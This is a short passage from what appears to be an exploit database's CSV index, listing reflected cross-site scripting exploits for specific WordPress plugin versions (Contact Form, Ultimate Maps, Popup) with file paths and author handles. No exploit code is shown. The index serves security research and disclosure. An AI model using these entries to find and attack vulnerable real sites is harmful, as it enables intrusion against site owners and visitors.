Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php, +50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, +50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, +50346,exploits/php/webapps/50346.txt,"WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,